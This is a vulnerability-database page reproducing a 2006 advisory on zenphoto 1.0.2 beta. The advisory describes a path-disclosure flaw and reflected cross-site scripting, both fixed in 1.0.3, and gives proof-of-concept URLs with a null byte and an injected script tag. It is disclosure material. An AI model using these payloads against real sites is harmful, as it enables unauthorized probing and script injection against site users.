Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

zenphoto1.0.2.txt

πŸ—“οΈΒ 17 Oct 2006Β 00:00:00Reported byΒ Raphael HuckTypeΒ 
packetstorm
Β packetstormπŸ”—Β packetstormsecurity.comπŸ‘Β 22Β Views

Vulnerabilities in zenphoto 1.0.2 beta and below addressed in 1.0.3 beta

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Vendor: zenphoto  
Vulnerable: zenphoto 1.0.2 beta and below  
  
The vendor has been warned and the vulnerabilities have been addressed in 1.0.3 beta.  
  
Path Disclosure  
---------------  
http://www.example.com/photos/zen/i.php?a=EXISTING_ALBUM_NAME&i=EXISTING_IMAGE_NAME&s=thumb%00  
  
which returns:  
  
Warning: imagecreatetruecolor() [function.imagecreatetruecolor]: Invalid image dimensions in /path/photos/zen/i.php on line 85...  
  
Cross Site Scripting  
--------------------  
http://www.example.com/photos/index.php?album=EXISTING_ALBUM_NAME%00%3Cscript%3Ealert('XSS%20Vulnerable')%3B%3C/script%3E  
http://www.example.com/photos/index.php?album=EXISTING_ALBUM_NAMEβ„‘=EXISTING_IMAGE_NAME%00%3Cscript%3Ealert('XSS%20Vulnerable')%3B%3C/script%3Eaaaa  
  
Solution  
--------  
Update to 1.0.3 beta  
  
Original advisory  
-----------------  
http://zone14.free.fr/advisories/4/  
  
--Raphael HUCK  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Oct 2006 00:00Current
7.4High risk
Vulners AI Score7.4
zenphoto1.0.2betavendorpath disclosurecross site scriptingupdate1.0.3advisoryraphael huckexploit
22
.json
Report